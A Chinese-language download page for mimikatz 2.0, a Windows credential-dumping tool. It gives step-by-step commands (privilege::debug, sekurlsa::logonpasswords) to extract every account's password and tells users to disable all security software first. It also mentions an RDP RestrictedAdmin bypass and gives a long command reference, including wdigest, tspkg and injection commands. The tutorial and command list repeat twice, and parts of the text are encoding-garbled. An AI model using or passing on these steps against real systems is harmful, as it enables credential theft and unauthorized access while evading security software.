mimikatz(windows密碼抓取神器)
詳情介紹
mimikatz2.0是一個(gè)簡(jiǎn)單且好用的windows密碼抓取神器,它可幫助用戶一鍵抓取window密碼,其具有操作簡(jiǎn)單、使用方便等特點(diǎn)。新版能夠通過(guò)獲取的kerberos登錄憑據(jù),繞過(guò)支持RestrictedAdmin模式的win8或win2012svr的遠(yuǎn)程終端(RDP) 的登陸認(rèn)證。建議默認(rèn)禁止RestrictedAdmin模式登錄。使用mimikatz2.0請(qǐng)關(guān)閉本機(jī)所有的安全軟件,因?yàn)槠鋵儆诤诳统绦?,安全軟件不退出就無(wú)法運(yùn)行。
1、首先打開mimikatz2.0,該版本分為32位和64位,用戶可根據(jù)自己計(jì)算機(jī)的操作系統(tǒng)進(jìn)行相應(yīng)選擇,若不知道自己的操作系統(tǒng)位數(shù),請(qǐng)鼠標(biāo)右鍵點(diǎn)擊“計(jì)算機(jī)”-“屬性”,在系統(tǒng)類型中即可知曉
2、打開之后先輸入privilege::debug //提升權(quán)限
2、再輸入sekurlsa::logonpasswords //抓取密碼
3、獲取本機(jī)的所有賬號(hào)的Windows密碼
1.mimikatz # cls -->清屏,類似dos命令cls
2.mimikatz # exit -->退出mimikatz
3.mimikatz #version -->查看當(dāng)前的mimikatz的版本
二、系統(tǒng)方面的操作使用命令:system
1.mimikatz #system::user -->查看當(dāng)前登錄的系統(tǒng)用戶
2.mimikazt #system::computer -->返回當(dāng)前的計(jì)算機(jī)名稱
三、在服務(wù)器終端的操作命令: ts
1.mimikatz #ts::sessions -->顯示當(dāng)前的會(huì)話
2.mimikatz #ts::processes windows-d.vm.nirvana.local -->顯示服務(wù)器的進(jìn)程和對(duì)應(yīng)的pid情況等
四、系統(tǒng)服務(wù)相關(guān)的操作使用命令:service
五、系統(tǒng)進(jìn)程相關(guān)操作的使用命令:process
六、系統(tǒng)線程相關(guān)操作使用命令:thread
七、系統(tǒng)句柄相關(guān)操作使用命令:handle
八、加密相關(guān)操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基礎(chǔ)命令
1.cls清屏
2.exit退出
3.version查看mimikatz的版本
4.help查看幫助信息
5.system::user查看當(dāng)前登錄的系統(tǒng)用戶
6.system::computer查看計(jì)算機(jī)名稱
7.process::list列出進(jìn)程
8.process::suspend進(jìn)程名稱 暫停進(jìn)程
9.process::stop進(jìn)程名稱 結(jié)束進(jìn)程
10.process::modules列出系統(tǒng)的核心模塊及所在位置
11.service::list列出系統(tǒng)的服務(wù)
12.service::remove移除系統(tǒng)的服務(wù)
13.service::start stop服務(wù)名稱 啟動(dòng)或停止服務(wù)
14.privilege::list列出權(quán)限列表
15.privilege::enable激活一個(gè)或多個(gè)權(quán)限
16.privilege::debug提升權(quán)限
17.nogpo::cmd打開系統(tǒng)的cmd.exe
18.nogpo::regedit打開系統(tǒng)的注冊(cè)表
19.nogpo::taskmgr打開任務(wù)管理器
20.ts::sessions顯示當(dāng)前的會(huì)話
21.ts::processes顯示進(jìn)程和對(duì)應(yīng)的pid情況等
22.sekurlsa::wdigest獲取本地用戶信息及密碼
23.sekurlsa::wdigest獲取kerberos用戶信息及密碼
24.sekurlsa::tspkg獲取tspkg用戶信息及密碼
25.sekurlsa::logonPasswords獲登陸用戶信息及密碼
使用教程
獲取windows密碼的方法很簡(jiǎn)單,mimikatz2.0版本的只需要兩條命令就可以了:1、首先打開mimikatz2.0,該版本分為32位和64位,用戶可根據(jù)自己計(jì)算機(jī)的操作系統(tǒng)進(jìn)行相應(yīng)選擇,若不知道自己的操作系統(tǒng)位數(shù),請(qǐng)鼠標(biāo)右鍵點(diǎn)擊“計(jì)算機(jī)”-“屬性”,在系統(tǒng)類型中即可知曉
2、打開之后先輸入privilege::debug //提升權(quán)限
2、再輸入sekurlsa::logonpasswords //抓取密碼
3、獲取本機(jī)的所有賬號(hào)的Windows密碼
mimikatz命令
一、常規(guī)的操作使用命令1.mimikatz # cls -->清屏,類似dos命令cls
2.mimikatz # exit -->退出mimikatz
3.mimikatz #version -->查看當(dāng)前的mimikatz的版本
二、系統(tǒng)方面的操作使用命令:system
1.mimikatz #system::user -->查看當(dāng)前登錄的系統(tǒng)用戶
2.mimikazt #system::computer -->返回當(dāng)前的計(jì)算機(jī)名稱
三、在服務(wù)器終端的操作命令: ts
1.mimikatz #ts::sessions -->顯示當(dāng)前的會(huì)話
2.mimikatz #ts::processes windows-d.vm.nirvana.local -->顯示服務(wù)器的進(jìn)程和對(duì)應(yīng)的pid情況等
四、系統(tǒng)服務(wù)相關(guān)的操作使用命令:service
五、系統(tǒng)進(jìn)程相關(guān)操作的使用命令:process
六、系統(tǒng)線程相關(guān)操作使用命令:thread
七、系統(tǒng)句柄相關(guān)操作使用命令:handle
八、加密相關(guān)操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基礎(chǔ)命令
1.cls清屏
2.exit退出
3.version查看mimikatz的版本
4.help查看幫助信息
5.system::user查看當(dāng)前登錄的系統(tǒng)用戶
6.system::computer查看計(jì)算機(jī)名稱
7.process::list列出進(jìn)程
8.process::suspend進(jìn)程名稱 暫停進(jìn)程
9.process::stop進(jìn)程名稱 結(jié)束進(jìn)程
10.process::modules列出系統(tǒng)的核心模塊及所在位置
11.service::list列出系統(tǒng)的服務(wù)
12.service::remove移除系統(tǒng)的服務(wù)
13.service::start stop服務(wù)名稱 啟動(dòng)或停止服務(wù)
14.privilege::list列出權(quán)限列表
15.privilege::enable激活一個(gè)或多個(gè)權(quán)限
16.privilege::debug提升權(quán)限
17.nogpo::cmd打開系統(tǒng)的cmd.exe
18.nogpo::regedit打開系統(tǒng)的注冊(cè)表
19.nogpo::taskmgr打開任務(wù)管理器
20.ts::sessions顯示當(dāng)前的會(huì)話
21.ts::processes顯示進(jìn)程和對(duì)應(yīng)的pid情況等
22.sekurlsa::wdigest獲取本地用戶信息及密碼
23.sekurlsa::wdigest獲取kerberos用戶信息及密碼
24.sekurlsa::tspkg獲取tspkg用戶信息及密碼
25.sekurlsa::logonPasswords獲登陸用戶信息及密碼
下載地址
- 電腦版
mimikatz(windows密碼抓取神器) v2.0
- 本地下載通道:
- 浙江電信下載
- 北京聯(lián)通下載
- 江蘇電信下載
- 廣東電信下載
同類軟件
網(wǎng)友評(píng)論
共0條評(píng)論(您的評(píng)論需要經(jīng)過(guò)審核才能顯示)